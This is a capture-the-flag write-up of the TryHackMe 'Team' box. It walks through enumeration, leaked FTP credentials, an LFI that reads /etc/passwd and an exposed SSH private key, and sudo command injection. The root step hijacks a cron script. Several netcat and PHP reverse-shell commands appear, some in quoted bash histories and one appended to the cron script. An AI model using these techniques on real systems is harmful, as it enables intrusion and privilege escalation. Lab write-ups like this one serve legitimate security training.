---
layout: post
title: "Team - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - thm
  - eop
  - ftp
  - web
  - lfi
  - sudo
date: 2021/06/25 21:25:00
thumbnail: /images/TryHackMe/teamcw.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Team
- **Profile:** [tryhackme.com](https://tryhackme.com/room/teamcw)
- **Difficulty:** Easy
- **Description**: Beginner friendly boot2root machine

![Team](/images/TryHackMe/teamcw.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap ffuf bfac
```

## Network enumeration

Port and service scan with nmap:

```
# Nmap 7.91 scan initiated Tue May 11 15:15:28 2021 as: nmap -sSVC -p- -oA nmap_full -v 10.10.103.106
Nmap scan report for 10.10.103.106
Host is up (0.027s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
|   256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_  256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 11 15:18:09 2021 -- 1 IP address (1 host up) scanned in 161.56 seconds
```

Let's add a domain:

```
$ grep team /etc/hosts
10.10.103.106 teamcw.thm
```

## FTP discovery

I tried to connect to the ftp with the anonymous user and to run some NSE scripts
but without luck:

```
$ sudo nmap -sS 10.10.103.106 -p 21 --script 'default and ftp-*' -v
```

## Web nonsense

At http://teamcw.thm/ we face the Apache2 Ubuntu Default Page.

Let's try to find some sub-directories or hidden files:

```
$ ffuf -u http://teamcw.thm/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
$ ffuf -u http://teamcw.thm/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
$ ffuf -u http://teamcw.thm/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .txt,.php
```

So I found nothing. The thing is that I always use the id of the room as local
domain for TryHackme (eg. here `teamcw.thm`) but it seems the only configured
vhost that can answer is `team.thm`, there is no fallback on anything else.

```
$ grep team /etc/hosts
10.10.114.89 teamcw.thm team.thm
```

Now we have a web app at http://team.thm/.

Let's re-enum using this domain.

```
$ ffuf -u http://team.thm/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
...
assets                  [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 30ms]
images                  [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 4454ms]
scripts                 [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 4454ms]

$ ffuf -u http://team.thm/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
...
index.html              [Status: 200, Size: 2966, Words: 140, Lines: 90, Duration: 77ms]
robots.txt              [Status: 200, Size: 5, Words: 1, Lines: 2, Duration: 67ms]

$ ffuf -u http://team.thm/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .txt,.php
```

http://team.thm/robots.txt is only containing 1 word: `dale`.

Warning: the following step is purely unrealistic and CTF-like.

```
$ ffuf -u http://team.thm/scripts/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .txt
...
script.txt              [Status: 200, Size: 597, Words: 52, Lines: 22, Duration: 27ms]
```

There is a file http://team.thm/scripts/script.txt containing a backup of a bash
script. In a true webapp `/scripts/` only contains `.js` files so you won't
normally enumerate for `.txt` here and since when anyone would store a bash
script here? Plus the file should be named `ftp.sh` or `ftp-backup.sh` not
`script.txt`. We can shame the author `dalemazza` for this scenario.

`script.txt`

```bash
#!/bin/bash
read -p "Enter Username: " REDACTED
read -sp "Enter Username Password: " REDACTED
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit

# Updated version of the script
# Note to self had to change the extension of the old "script" in this folder, as it has creds in
```

lol this dummy comment at the end trying to justify this broken scenario.
My bad it's not even that it's a hint to tell you to find a backup file for this
script (with a different extension) to find an unedited version containing the
credentials.

```
$ bfac -u http://team.thm/scripts/script.txt
----------------------------------------------------------------------
                 _____ _____ _____ _____
                | __  |   __|  _  |     |
                | __ -|   __|     |   --|
                |_____|__|  |__|__|_____|

           -:::Backup File Artifacts Checker:::-
                     Version: 1.4
  Advanced Backup-File Artifacts Testing for Web-Applications
Author: Mazin Ahmed | <mazin AT mazinahmed DOT net> | @mazen160
----------------------------------------------------------------------


[i] URL: http://team.thm/scripts/script.txt
[$] Discovered: -> {http://team.thm/scripts/script.txt} (Response-Code: 200 | Content-Length: 597)
[$] Discovered: -> {http://team.thm/scripts/script.old} (Response-Code: 200 | Content-Length: 466)

[i] Findings:
http://team.thm/scripts/script.txt (200) | (Content-Length: 597)
http://team.thm/scripts/script.old (200) | (Content-Length: 466)

[i] Finished performing scan.
```

`script.old`

```bash
#!/bin/bash
read -p "Enter Username: " ftpuser
read -sp "Enter Username Password: " T3@m$h@r3
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit
```

Now we have FTP credentials.

## FTP discovery 2

It's containing only one file:

```
$ ftp team.thm
Connected to teamcw.thm.
220 (vsFTPd 3.0.3)
Name (team.thm:noraj): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 65534    65534        4096 Jan 15 21:25 workshare
226 Directory send OK.
ftp> ls workshare
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 1002     1002          269 Jan 15 21:24 New_site.txt
226 Directory send OK.
ftp> cd workshare
250 Directory successfully changed.
ftp> get New_site.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for New_site.txt (269 bytes).
226 Transfer complete.
269 bytes received in 4,7e-05 seconds (5,46 Mbytes/s)
```

`New_site.txt`

```
Dale
  I have started coding a new website in PHP for the team to use, this is currently under development. It can be
found at ".dev" within our domain.

Also as per the team policy please make a copy of your "id_rsa" and place this in the relevant config file.

Gyles
```

I guess he made a mistake and meant `dev` (`dev.`) sub-domain rather than `.dev`
in the domain.

## Web exploitation: LFI

The dev website is at http://dev.team.thm/

There is a link to http://dev.team.thm/script.php?page=teamshare.php

It seems like a very intentional CTF-like LFI vulnerability.

lol not even fun when it's that easy: http://dev.team.thm/script.php?page=/etc/passwd

`/etc/passwd`

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
dale:x:1000:1000:anon,,,:/home/dale:/bin/bash
gyles:x:1001:1001::/home/gyles:/bin/bash
ftpuser:x:1002:1002::/home/ftpuser:/bin/sh
ftp:x:110:116:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
```

We can keep in mind to target `dale` and `gyles`.

> Also as per the team policy please make a copy of your "id_rsa" and place this in the relevent config file.

Let's hunt for SSH keys.

Not working:

- /home/dale/.ssh/id_rsa
- /home/gyles/.ssh/id_rsa

Let's try some other candidates:

```
$ grep ssh /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
```

The nonsense continue in the SSH server config `/etc/ssh/sshd_config` we can
find dale SSH private key in **comment**. This is totally not how the SSH server
config works. The author `dalemazza` hadn't the skills to find how it works so
he just decided the dump the key in comment. How unrealistic. Plus to write in
`/etc/ssh/sshd_config` you must have root permission so we'll see in next steps
if `dale` is not sudoers it would mean the scenario would be even more broken.

```
...
AllowUsers dale gyles



#Dale id_rsa
#-----BEGIN OPENSSH PRIVATE KEY-----
#b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
#NhAAAAAwEAAQAAAYEAng6KMTH3zm+6rqeQzn5HLBjgruB9k2rX/XdzCr6jvdFLJ+uH4ZVE
#NUkbi5WUOdR4ock4dFjk03X1bDshaisAFRJJkgUq1+zNJ+p96ZIEKtm93aYy3+YggliN/W
#oG+RPqP8P6/uflU0ftxkHE54H1Ll03HbN+0H4JM/InXvuz4U9Df09m99JYi6DVw5XGsaWK
#o9WqHhL5XS8lYu/fy5VAYOfJ0pyTh8IdhFUuAzfuC+fj0BcQ6ePFhxEF6WaNCSpK2v+qxP
#zMUILQdztr8WhURTxuaOQOIxQ2xJ+zWDKMiynzJ/lzwmI4EiOKj1/nh/w7I8rk6jBjaqAu
#k5xumOxPnyWAGiM0XOBSfgaU+eADcaGfwSF1a0gI8G/TtJfbcW33gnwZBVhc30uLG8JoKS
#xtA1J4yRazjEqK8hU8FUvowsGGls+trkxBYgceWwJFUudYjBq2NbX2glKz52vqFZdbAa1S
#0soiabHiuwd+3N/ygsSuDhOhKIg4MWH6VeJcSMIrAAAFkNt4pcTbeKXEAAAAB3NzaC1yc2
#EAAAGBAJ4OijEx985vuq6nkM5+RywY4K7gfZNq1/13cwq+o73RSyfrh+GVRDVJG4uVlDnU
#eKHJOHRY5NN19Ww7IWorABUSSZIFKtfszSfqfemSBCrZvd2mMt/mIIJYjf1qBvkT6j/D+v
#7n5VNH7cZBxOeB9S5dNx2zftB+CTPyJ177s+FPQ39PZvfSWIug1cOVxrGliqPVqh4S+V0v
#JWLv38uVQGDnydKck4fCHYRVLgM37gvn49AXEOnjxYcRBelmjQkqStr/qsT8zFCC0Hc7a/
#FoVEU8bmjkDiMUNsSfs1gyjIsp8yf5c8JiOBIjio9f54f8OyPK5OowY2qgLpOcbpjsT58l
#gBojNFzgUn4GlPngA3Ghn8EhdWtICPBv07SX23Ft94J8GQVYXN9LixvCaCksbQNSeMkWs4
#xKivIVPBVL6MLBhpbPra5MQWIHHlsCRVLnWIwatjW19oJSs+dr6hWXWwGtUtLKImmx4rsH
#ftzf8oLErg4ToSiIODFh+lXiXEjCKwAAAAMBAAEAAAGAGQ9nG8u3ZbTTXZPV4tekwzoijb
#esUW5UVqzUwbReU99WUjsG7V50VRqFUolh2hV1FvnHiLL7fQer5QAvGR0+QxkGLy/AjkHO
#eXC1jA4JuR2S/Ay47kUXjHMr+C0Sc/WTY47YQghUlPLHoXKWHLq/PB2tenkWN0p0fRb85R
#N1ftjJc+sMAWkJfwH+QqeBvHLp23YqJeCORxcNj3VG/4lnjrXRiyImRhUiBvRWek4o4Rxg
#Q4MUvHDPxc2OKWaIIBbjTbErxACPU3fJSy4MfJ69dwpvePtieFsFQEoJopkEMn1Gkf1Hyi
#U2lCuU7CZtIIjKLh90AT5eMVAntnGlK4H5UO1Vz9Z27ZsOy1Rt5svnhU6X6Pldn6iPgGBW
#/vS5rOqadSFUnoBrE+Cnul2cyLWyKnV+FQHD6YnAU2SXa8dDDlp204qGAJZrOKukXGIdiz
#82aDTaCV/RkdZ2YCb53IWyRw27EniWdO6NvMXG8pZQKwUI2B7wljdgm3ZB6fYNFUv5AAAA
#wQC5Tzei2ZXPj5yN7EgrQk16vUivWP9p6S8KUxHVBvqdJDoQqr8IiPovs9EohFRA3M3h0q
#z+zdN4wIKHMdAg0yaJUUj9WqSwj9ItqNtDxkXpXkfSSgXrfaLz3yXPZTTdvpah+WP5S8u6
#RuSnARrKjgkXT6bKyfGeIVnIpHjUf5/rrnb/QqHyE+AnWGDNQY9HH36gTyMEJZGV/zeBB7
#/ocepv6U5HWlqFB+SCcuhCfkegFif8M7O39K1UUkN6PWb4/IoAAADBAMuCxRbJE9A7sxzx
#sQD/wqj5cQx+HJ82QXZBtwO9cTtxrL1g10DGDK01H+pmWDkuSTcKGOXeU8AzMoM9Jj0ODb
#mPZgp7FnSJDPbeX6an/WzWWibc5DGCmM5VTIkrWdXuuyanEw8CMHUZCMYsltfbzeexKiur
#4fu7GSqPx30NEVfArs2LEqW5Bs/bc/rbZ0UI7/ccfVvHV3qtuNv3ypX4BuQXCkMuDJoBfg
#e9VbKXg7fLF28FxaYlXn25WmXpBHPPdwAAAMEAxtKShv88h0vmaeY0xpgqMN9rjPXvDs5S
#2BRGRg22JACuTYdMFONgWo4on+ptEFPtLA3Ik0DnPqf9KGinc+j6jSYvBdHhvjZleOMMIH
#8kUREDVyzgbpzIlJ5yyawaSjayM+BpYCAuIdI9FHyWAlersYc6ZofLGjbBc3Ay1IoPuOqX
#b1wrZt/BTpIg+d+Fc5/W/k7/9abnt3OBQBf08EwDHcJhSo+4J4TFGIJdMFydxFFr7AyVY7
#CPFMeoYeUdghftAAAAE3A0aW50LXA0cnJvdEBwYXJyb3QBAgMEBQYH
#-----END OPENSSH PRIVATE KEY-----
```

Let's save it in `id_rsa_dale` and remove the comment tags.

Set correct permissions:

```
$ chmod 600 id_rsa_dale
```

## System enumeration

Connect via SSH with the key.

```
$ ssh dale@team.thm -i id_rsa_dale
Last login: Mon Jan 18 10:51:32 2021
dale@TEAM:~$ id
uid=1000(dale) gid=1000(dale) groups=1000(dale),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare),1003(editors)
dale@TEAM:~$ sudo -l
Matching Defaults entries for dale on TEAM:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dale may run the following commands on TEAM:
    (gyles) NOPASSWD: /home/gyles/admin_checks
```

What did I tell you? dale is sudoer but can only run `/home/gyles/admin_checks`
command as gyles so he couldn't have edited `/etc/ssh/sshd_config` as root.
I fear this nonsense never end.

Before trying to EoP let's dump the flag.

```
dale@TEAM:~$ cat user.txt
THM{edited}
```

lol `.bash_history` has not been blocked so we can find the next steps and
know how to EoP... seeing how the author prepared the box and tested it.

```
id
uname -a
exit
clear
exyt
exit
ls -la
chmod 700 .ssh
cd .ssh
ls -la
chmod 600 authorized_keys
sudo chmod 600 authorized_keys
ls -l0a
ls -la
sudo chown authorized_keys
sudo chown dale:dale authorized_keys
sudo chown dale:dale id_rsa
ls -la
chmod 644 id_rsa
ls -la
netstat -tulpn
systemctl start vsftpd
netstat -tulpn
sudo systemctl start vsftpd
netstat -tulpn
sudo ufw
sudo ufw app list
sudo ufw allow `vsftpd`
sudo ufw allow 'vsftpd'
sudo ufw allow 'vsftpd.service'
sudo ufw allow vsftpd
sudo ufw allow 21
sudo ufw
netstat -tulpn
sudo netstat -tulpn
sudo apt install vsftpd
sudo systemctl enable vsftpd
netstat -tulpn
sudo systemctl start vsftpd
netstat -tulpn
ftp localhost
cat /etc/vsftpd.conf
less /etc/vsftpd.conf
sudo systemctl status vsftpd
ls /etc/

ls /etc/ | grep vsftpd]
ls /etc/ | grep vsftpd
ls -la /etc/ | grep vsftpd
less /etc/vsftpd.conf
sudo nano /etc/vsftpd.conf
sudo systemctl status vsftpd
sudo systemctl restart vsftpd
sudo systemctl status vsftpd
sudo chown nobody:nogroup /home/ftpuser
cd /home
ls -la
cd ftpuser/
ls
ls -la
sudo chown nobody:nogroup workshare/
ls -la
sudo nano /etc/vsftpd.conf
clear#
clear
ls
ls -la
sudo -l
su root
cd
ls -la
nano user.txt
cat user.txt
clear
ls -la
reboot
sudo -l
exity
exit
id
ls
sudo -l
sudo -u gyles /home/gyles/admin_checks
clear
cd /var/stats/
ls
ls -la
sudo chmod 666 stats.txt
ls -la
sudo chown dale:editors stats.txt
ls -la
cd
sudo -u gyles /home/gyles/admin_checks
ls -la /var/stats/
rm /var/stats/stats-2021-01-15-21-59.bak
clear
ls -la
sudo -u gyles /home/gyles/admin_checks
clear
ls
pwd
ls -la
netstat -tulpn
cat user.txt
su root
ls
wget
wget http://192.168.88.128:8000/lin.sh .
chmod +x lin.sh
./lin.sh
sudo -u#-1 bash
ls
rm lin.sh
ls -la
sudo -l
sudo -u gyles /home/gyles/admin_checks
clear
exit
ls
cd
ls
ls -la
sudo shutdown
su root
ls
cd /var/www
ls
clear
ls -la
less /etc/apache2/apache2.conf
cd html
ls
nano index.html
sudo nano index.html
su root
ls
su gyles
ls
sudo -l
sudo -u gyles /home/gyles/admin_checks
ls
./php
ls
cd ..
ls
ls -ls
su gyles
dale
id
ls
ls
cd
ls
ls -la
su root
ls
user
id
whoami
cd
cd
ls
cd
ls
su root
cd
ls
cd
cd ..
ls
ls -la
sudo -l
sudo -u gyles /home/gyles/admin_checks
ls -la /bin/ | grep bash
su root
su root
ls
reboot
shutdown
cd /home/gyes
cd /home/gyles/
ls -la
su root
su rrot
su root
sudo -l
sudo -u gyles /home/gyles/admin_checks
clear
sudo -u gyles /home/gyles/admin_checks
clear
cd /var/backups/
ls
cd www
ls -la
cd dev/
ls -ls
cat /home/gyles/admin_checks
cd ..
cd stats/
ls -la
rm stats-*
ls -la
shutdown
```

```
$ cat /home/gyles/admin_checks
#!/bin/bash

printf "Reading stats.\n"
sleep 1
printf "Reading stats..\n"
sleep 1
read -p "Enter name of person backing up the data: " name
echo $name  >> /var/stats/stats.txt
read -p "Enter 'date' to timestamp the file: " error
printf "The Date is "
$error 2>/dev/null

date_save=$(date "+%F-%H-%M")
cp /var/stats/stats.txt /var/stats/stats-$date_save.bak

printf "Stats have been backed up\n"
```

## EoP: from dale to gyles

The error input is used as command directly so we can inject a shell if we want.

```
dale@TEAM:~$ sudo -u gyles /home/gyles/admin_checks
Reading stats.
Reading stats..
Enter name of person backing up the data: noraj
Enter 'date' to timestamp the file: /bin/bash -i
The Date is uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
```

Then upgrade to PTY with `python3 -c 'import pty;pty.spawn("/bin/bash")'`.

`.bash_history`

```
cd
ls -la
nano admin_checks
scp dale@192.168.88.129:/home/gyles/admin_checks /home/gyles/admin_checks
ls
ls -la
cat admin_checks 
su root
ls
cd
ls -la
scp gyles@192.168.88.129:/home/gyles/admin_checks /home/gyles/
scp root@192.168.88.129:/home/gyles/admin_checks /home/gyles/
sudo scp root@192.168.88.129:/home/gyles/admin_checks /home/gyles/
su root
ls
cat /etc/shells
echo $SHELL
chsh -s /bin/bash
echo $SHELL
exit
ls
echo $SHELL
ls
sudo -l
cat /etc/crontab
which nc
nc
nc 192.168.88.128 -e /bin/bash
nc 192.168.88.128 < /bin/bash
nc -e
ps aux | grep root
ls
su root
ls
cd
ls
ls -la
su root
id
cd /opt
ls -la
cd admin_stuff/
ls
./blog_backup.sh 
clear
ls
ls -la
su root
./nc -e /bin/bash 192.168.88.128 4444
./nc -e /bin/bash -p 192.168.88.128 4444
./nc -e "/bin/bash -p" 192.168.88.128 4444
ls -la
./nc -e /bin/sh 192.168.88.128 4444
ls
sudo install -m =xs $(netcat-tradtional)
sudo install -m =xs $(which nc)
ls -la
reboot
shutdown
nc -e
clear
./nc -e /bin/bash localhost
sudo chown :admin nc 
./nc -e /bin/bash localhost
./nc -e /bin/bash 192.168.88.128 4444
clear
ls -la
su root
cd /opt/admin_stuff/
ls -la
id
clear
./nc -e /bin/bash 192.168.88.128 4444
ls -la
sudo chmod g+s nc 
ls
ls -la
./nc -e /bin/bash 192.168.88.128 4444
ls -la
cat /etc/crontab 
php
which php
ls -la
php -r '$sock=fsockopen("192.168.88.128",4444);exec ("/bin/sh -i <&3 >&3 2>&3");'
exit
id
whoami
pwd
cd /root
ls
cat root.txt 
rm test.txt 
rm log.log 
ls -la
exi
exit
id
/bin/bash -p
exit
id
/bin/bash
exit
ls
ls -la
cd /opt/admin_stuff/
ls -la
which php
sudo cp /usr/bin/php .
ls -la
sudo g+s php 
sudo chmod g+s php 
ls -la
./php -r '$sock=fsockopen("192.168.88.128",4444);exec ("/bin/sh -i <&3 >&3 2>&3");'
ls -la
sudo chown :admin php 
ls -la
sudo chmod g+s php 
ls -la
./php -r '$sock=fsockopen("192.168.88.128",4444);exec ("/bin/sh -i <&3 >&3 2>&3");'
./php -r "pcntl_exec('/bin/sh', ['-p']);"
sudo install -m =xs $(which php) .
ls -la
./php -r "pcntl_exec('/bin/sh', ['-p']);"
sudo chmod 002 nc
ls -la
sudo chmod 004 nc
ls -la
sudo chmod 005 nc
ls -la
sudo chmod 001 nc
ls -la
sudo chown :root nc
ls -la
sudo chown xs nc
sudo chmod xs nc
sudo chmod gu+s nc
ls -la
./nc -e
./nc -e 192.168.88.128 4444
./nc -e /bin/bash 192.168.88.128 4444
sudo add-apt-repository universe
apt search netcat
sudo install netcat-tradtional
sudo install netcat-traditional
sudo apt -get install netcat-traditional
sudo apt-get install netcat-traditional
nc -e
which nc
which nc-tradtional
locate nc
clear
locate nc | grep netcat
ls -la
sudo apt-get remove netcat-traditional
sudo install -m =xs $(which nc) .
ls -la

which nc
sudo apt-get install netcat-traditional
cd /usr/bin
ls -la
ls -la | grep net
ls -la | grep nc
locate nc
which nc
cd /bin
ls -la | grep nc
cd /opt/admin_stuff/
sudo install -m =xs $(/bin/nc.traditional) .
sudo install -m =xs /bin/nc.traditional .
ls -la
./nc.traditional -e
./nc.traditional -e /bin/bash 192.168.88.128 4444
./nc.traditional -e /bin/sh 192.168.88.128 4444
rm nc*
sudo rm n*
ls
ls -la
su dale
cd /usr/local/bin/
ls -la
sudo nano main_backup.sh
cd /var/backups/
sudo mkdir team.thm
ls -la
cd www
ls
cd ..
ls
nano /usr/local/bin/main_backup.sh 
sudo nano /usr/local/bin/main_backup.sh 
ls -la
rm team.thm/
rm -r team.thm/
sudo rm -r team.thm/
ls -la
cd www
ls -ls
cd team
cd team.thm/
ls -la
date
ls -la
sudo rm *
ls
ls -la
ls 
ls
ls -la
cat /usr/local/bin/main_backup.sh 
ls
/opt/admin_stuff/./script.sh 
ls
sudo chmmod +x /usr/local/bin/main_backup.sh 
sudo chmod +x /usr/local/bin/main_backup.sh 
ls
sudo /opt/admin_stuff/./script.sh 
ls
clear
sudo rm *
ls
ls#
ls
ls -la
ls
nano /usr/local/bin/main_backup.sh 
cd /var/usr
cd /usr/local/
ls -la
sudo chown :admin bin
sudo chmod 775 bin/
ls
ls -la
cd bin
ls -la
sudo chown :admin main_backup.sh 
sudo chmod 775 main_backup.sh 
ls -la
nano main_backup.sh 
ls
ls -la
id
nano main_backup.sh 
cd home
cd
ls -la
ls
l
ls
cat root.txt 
ls
rm root.txt 
sudo rm root.txt 
nano /usr/local/bin/main_backup.sh 
ls
/bin/bash
ls
cd /usr/local/sbin/
cat /usr/local/bin/main_backup.sh 
nano dev_backup.sh
sudo nano dev.backup.sh
ls /var/backups/www/
nano dev_backup.sh
ls
nano dev.backup.sh 
sudo nano dev.backup.sh 
sudo nano /opt/admin_stuff/script.sh 
sudo chmod +x dev.backup.sh 
ls
ls -la
cd /var/backups/
ls -la
cd www
ls
cd dev/
ls 
ls -la
rm *
sudo rm *
ls -la
ls
ls -la
cat /usr/local/sbin/dev.backup.sh 
ls
ls /var/www/
sudo nano /usr/local/sbin/dev.backup.sh 
sudo cat /usr/local/sbin/dev.backup.sh 
ls
ls -la
cd ..
ls
ls -la
cd dev
ls
cd ../team.thm/
ls
cd ..
ls
rm main
rm -r main/
sudo rm -r main/
ls
ls -la
cd dev
ls
ls -la
cd ..
nano /usr/local/sbin/dev.backup.sh 
cat /usr/local/sbin/dev.backup.sh 
cat /usr/local/bin/main_backup.sh
cat /opt/admin_stuff/script.sh 
nano /usr/local/sbin/dev.backup.sh
UDO nano /usr/local/sbin/dev.backup
sudo nano /usr/local/sbin/dev.backup
sudo nano /usr/local/sbin/dev.backup.sh
clear
cd dev
ls -la
sudo nano /opt/admin_stuff/script.sh 
ls
diff /usr/local/sbin/dev_backup.sh /usr/local/bin/main_backup.sh 
ls
ls -la /usr/local/sbin/
cd /usr/local/sbin/
ls -la
sudo chmod +x dev_backup.sh 
sudo rm dev.backup.sh 
ls -la
cd /var/backups/www/dev/
ls
cd ..
ls -la
cd /usr/local/
ls -la
cd sbin/
ls
ls -la
nano dev_backup.sh 
ls
cd
ls
sudo rm root.txt 
ls
nano /usr/local/bin/main_backup.sh 
clear
ls
cd 
su root
cronjob -l
crontab -l

su root
ls
ls -la
sudo chmod 770 admin_stuff/
ls -la
cd admin_stuff/
ls -la
sudo chmod 440 php
ls -la
sudo chmod 110 php
ls -la
sudo chmod gu+s php
ls -la
./php
sudo ./php
clear
ls -la
ls
./php
rm php
ls
sudo rm php 
ls -la
cd ..
ls
ls -la
cd admin_stuff/
su root
lsa
ls
su dale
id
cd
ls
ls -la
reboot
su root
su root
```

## EoP: from gyles to root

```
gyles@TEAM:~$ id
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
```

There is a script owned by root that is believed to be executed in a cron job:

```
gyles@TEAM:~$ ls -lh /opt/admin_stuff/script.sh 
-rwxr--r-- 1 root root 200 Jan 17 20:38 /opt/admin_stuff/script.sh
gyles@TEAM:~$ cat /opt/admin_stuff/script.sh 
#!/bin/bash
#I have set a cronjob to run this script every minute


dev_site="/usr/local/sbin/dev_backup.sh"
main_site="/usr/local/bin/main_backup.sh"
#Back ups the sites locally
$main_site
$dev_site
```

This is a wrapper calling two other scripts.

```
gyles@TEAM:~$ ls -lh /usr/local/sbin/dev_backup.sh
-rwxr-xr-x 1 root root 64 Jan 17 19:42 /usr/local/sbin/dev_backup.sh
gyles@TEAM:~$ ls -lh /usr/local/bin/main_backup.sh
-rwxrwxr-x 1 root admin 65 Jan 17 20:36 /usr/local/bin/main_backup.sh
```

We notice that `main_backup.sh` is writable by the admin group that gyles is in.

```
gyles@TEAM:~$ cat /usr/local/bin/main_backup.sh
#!/bin/bash
cp -r /var/www/team.thm/* /var/backups/www/team.thm/
```

We'll append a reverse shell the script:
`nc.traditional -e /bin/bash 10.9.19.77 8888`.

Then we just have to wait 1 min!

```
$ pwncat -lvv 8888
INFO: Listening on :::8888 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:8888 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.224.185:46106 (family 2/IPv4, TCP)
id
uid=0(root) gid=0(root) groups=0(root),1004(admin)
pwd
/root
cat root.txt
THM{edited}
```

